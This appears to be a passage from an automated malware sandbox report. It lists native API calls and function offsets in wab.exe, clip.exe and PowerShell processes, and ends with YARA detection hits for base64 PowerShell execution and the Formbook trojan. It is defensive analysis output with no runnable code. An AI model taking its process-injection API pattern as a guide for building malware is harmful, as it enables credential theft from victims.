          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2CF0 NtOpenProcess,10_2_213B2CF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2CC0 NtQueryVirtualMemory,10_2_213B2CC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2F30 NtCreateSection,10_2_213B2F30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2F60 NtCreateProcessEx,10_2_213B2F60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2FB0 NtResumeThread,10_2_213B2FB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2FA0 NtQuerySection,10_2_213B2FA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2F90 NtProtectVirtualMemory,10_2_213B2F90
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2FE0 NtCreateFile,10_2_213B2FE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2E30 NtWriteVirtualMemory,10_2_213B2E30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2EA0 NtAdjustPrivilegesToken,10_2_213B2EA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2E80 NtReadVirtualMemory,10_2_213B2E80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2EE0 NtQueueApcThread,10_2_213B2EE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B3010 NtOpenDirectoryObject,10_2_213B3010
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B3090 NtSetValueKey,10_2_213B3090
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B39B0 NtGetContextThread,10_2_213B39B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B3D10 NtOpenProcessToken,10_2_213B3D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B3D70 NtOpenThread,10_2_213B3D70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_042952A1 Sleep,NtProtectVirtualMemory,10_2_042952A1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_044035C0 NtCreateMutant,LdrInitializeThunk,14_2_044035C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04404650 NtSuspendThread,LdrInitializeThunk,14_2_04404650
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04403090 NtSetValueKey,LdrInitializeThunk,14_2_04403090
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04404340 NtSetContextThread,LdrInitializeThunk,14_2_04404340
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402C60 NtCreateKey,LdrInitializeThunk,14_2_04402C60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04402C70
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04402CA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04402D10
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_04402D30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402DD0 NtDelayExecution,LdrInitializeThunk,14_2_04402DD0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04402DF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402EE0 NtQueueApcThread,LdrInitializeThunk,14_2_04402EE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_04402E80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402F30 NtCreateSection,LdrInitializeThunk,14_2_04402F30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402FE0 NtCreateFile,LdrInitializeThunk,14_2_04402FE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402FB0 NtResumeThread,LdrInitializeThunk,14_2_04402FB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_044039B0 NtGetContextThread,LdrInitializeThunk,14_2_044039B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402AD0 NtReadFile,LdrInitializeThunk,14_2_04402AD0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402AF0 NtWriteFile,LdrInitializeThunk,14_2_04402AF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402B60 NtClose,LdrInitializeThunk,14_2_04402B60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04402BE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04402BF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_04402BA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04403010 NtOpenDirectoryObject,14_2_04403010
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402C00 NtQueryInformationProcess,14_2_04402C00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402CC0 NtQueryVirtualMemory,14_2_04402CC0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402CF0 NtOpenProcess,14_2_04402CF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04403D70 NtOpenThread,14_2_04403D70
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402D00 NtSetInformationFile,14_2_04402D00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04403D10 NtOpenProcessToken,14_2_04403D10
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402DB0 NtEnumerateKey,14_2_04402DB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402E30 NtWriteVirtualMemory,14_2_04402E30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402EA0 NtAdjustPrivilegesToken,14_2_04402EA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402F60 NtCreateProcessEx,14_2_04402F60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402F90 NtProtectVirtualMemory,14_2_04402F90
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402FA0 NtQuerySection,14_2_04402FA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402AB0 NtWaitForSingleObject,14_2_04402AB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04402B80 NtQueryInformationFile,14_2_04402B80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0410CA08 NtCreateSection,NtMapViewOfSection,14_2_0410CA08
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0410C3C8 NtQueryInformationProcess,NtReadVirtualMemory,14_2_0410C3C8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F3C2922_2_00007FF848F3C292
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F3B4E62_2_00007FF848F3B4E6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0415F1F06_2_0415F1F0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0415FAC06_2_0415FAC0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0415EEA86_2_0415EEA8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2140815810_2_21408158
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137010010_2_21370100
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141A11810_2_2141A118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214381CC10_2_214381CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214401AA10_2_214401AA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141200010_2_21412000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143A35210_2_2143A352
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214403E610_2_214403E6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E3F010_2_2138E3F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2142027410_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214002C010_2_214002C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138053510_2_21380535
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2144059110_2_21440591
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143244610_2_21432446
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2142E4F610_2_2142E4F6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138077010_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A475010_2_213A4750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137C7C010_2_2137C7C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139C6E010_2_2139C6E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139696210_2_21396962
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A010_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2144A9A610_2_2144A9A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138284010_2_21382840
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138A84010_2_2138A840
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213668B810_2_213668B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE8F010_2_213AE8F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143AB4010_2_2143AB40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21436BD710_2_21436BD7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA8010_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138AD0010_2_2138AD00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21398DBF10_2_21398DBF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137ADE010_2_2137ADE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380C0010_2_21380C00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370CF210_2_21370CF2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420CB510_2_21420CB5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A0F3010_2_213A0F30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213C2F2810_2_213C2F28
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F4F4010_2_213F4F40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FEFA010_2_213FEFA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138CFE010_2_2138CFE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21372FC810_2_21372FC8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380E5910_2_21380E59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143EE2610_2_2143EE26
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143EEDB10_2_2143EEDB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392E9010_2_21392E90
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143CE9310_2_2143CE93
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2144B16B10_2_2144B16B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136F17210_2_2136F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B516C10_2_213B516C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138B1B010_2_2138B1B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2142F0CC10_2_2142F0CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143F0E010_2_2143F0E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214370E910_2_214370E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213870C010_2_213870C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143132D10_2_2143132D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136D34C10_2_2136D34C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213C739A10_2_213C739A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213852A010_2_213852A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214212ED10_2_214212ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139B2C010_2_2139B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143757110_2_21437571
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141D5B010_2_2141D5B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137146010_2_21371460
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143F43F10_2_2143F43F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143F7B010_2_2143F7B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214316CC10_2_214316CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141591010_2_21415910
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138995010_2_21389950
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139B95010_2_2139B950
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ED80010_2_213ED800
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213838E010_2_213838E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FB7610_2_2143FB76
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139FB8010_2_2139FB80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213BDBF910_2_213BDBF9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F5BF010_2_213F5BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21437A4610_2_21437A46
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FA4910_2_2143FA49
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F3A6C10_2_213F3A6C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2142DAC610_2_2142DAC6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213C5AA010_2_213C5AA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141DAAC10_2_2141DAAC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21431D5A10_2_21431D5A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21437D7310_2_21437D73
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21383D4010_2_21383D40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139FDC010_2_2139FDC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F9C3210_2_213F9C32
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FCF210_2_2143FCF2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FF0910_2_2143FF09
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21381F9210_2_21381F92
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FFB110_2_2143FFB1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21389EB010_2_21389EB0
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C88BD613_2_03C88BD6
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C7D80E13_2_03C7D80E
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C86E7613_2_03C86E76
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C88DF613_2_03C88DF6
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03CA651613_2_03CA6516
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C8F53613_2_03C8F536
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448244614_2_04482446
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043C146014_2_043C1460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448F43F14_2_0448F43F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0447E4F614_2_0447E4F6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D053514_2_043D0535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448757114_2_04487571
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0449059114_2_04490591
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0446D5B014_2_0446D5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_044816CC14_2_044816CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043EC6E014_2_043EC6E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D077014_2_043D0770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043F475014_2_043F4750
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448F7B014_2_0448F7B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043CC7C014_2_043CC7C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0447F0CC14_2_0447F0CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_044870E914_2_044870E9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448F0E014_2_0448F0E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D70C014_2_043D70C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0445815814_2_04458158
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0449B16B14_2_0449B16B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0440516C14_2_0440516C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043C010014_2_043C0100
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043BF17214_2_043BF172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0446A11814_2_0446A118
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_044881CC14_2_044881CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043DB1B014_2_043DB1B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_044901AA14_2_044901AA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0447027414_2_04470274
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_044712ED14_2_044712ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043EB2C014_2_043EB2C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448A35214_2_0448A352
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448132D14_2_0448132D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043BD34C14_2_043BD34C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_044903E614_2_044903E6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043DE3F014_2_043DE3F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0441739A14_2_0441739A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D0C0014_2_043D0C00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04449C3214_2_04449C32
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448FCF214_2_0448FCF2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043C0CF214_2_043C0CF2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04470CB514_2_04470CB5
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04481D5A14_2_04481D5A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04487D7314_2_04487D73
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043DAD0014_2_043DAD00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D3D4014_2_043D3D40
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043E8DBF14_2_043E8DBF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043CADE014_2_043CADE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043EFDC014_2_043EFDC0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D0E5914_2_043D0E59
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448EE2614_2_0448EE26
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D9EB014_2_043D9EB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448EEDB14_2_0448EEDB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043E2E9014_2_043E2E90
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448CE9314_2_0448CE93
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04444F4014_2_04444F40
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043F0F3014_2_043F0F30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448FF0914_2_0448FF09
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04412F2814_2_04412F28
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D1F9214_2_043D1F92
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043DCFE014_2_043DCFE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04393FD214_2_04393FD2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04393FD514_2_04393FD5
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043C2FC814_2_043C2FC8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448FFB114_2_0448FFB1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0443D80014_2_0443D800
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043DA84014_2_043DA840
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D284014_2_043D2840
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043B68B814_2_043B68B8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043FE8F014_2_043FE8F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D38E014_2_043D38E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043E696214_2_043E6962
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D995014_2_043D9950
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043EB95014_2_043EB950
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043D29A014_2_043D29A0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0449A9A614_2_0449A9A6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448FA4914_2_0448FA49
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04487A4614_2_04487A46
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04443A6C14_2_04443A6C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0447DAC614_2_0447DAC6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043CEA8014_2_043CEA80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04415AA014_2_04415AA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0446DAAC14_2_0446DAAC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448AB4014_2_0448AB40
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0448FB7614_2_0448FB76
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04486BD714_2_04486BD7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04445BF014_2_04445BF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0440DBF914_2_0440DBF9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_043EFB8014_2_043EFB80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0410C3C814_2_0410C3C8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0410AC0814_2_0410AC08
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_04109ECF14_2_04109ECF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0410B6E814_2_0410B6E8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0410B80314_2_0410B803
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0410B80814_2_0410B808
          Source: C:\Windows\SysWOW64\clip.exeCode function: 14_2_0410BB9C14_2_0410BB9C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2136B970 appears 275 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 213C7E54 appears 100 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 213B5130 appears 57 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 213FF290 appears 103 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 213EEA12 appears 82 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 043BB970 appears 268 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04417E54 appears 91 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04405130 appears 36 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0443EA12 appears 86 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0444F290 appears 105 times
          Source: amsi32_7108.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
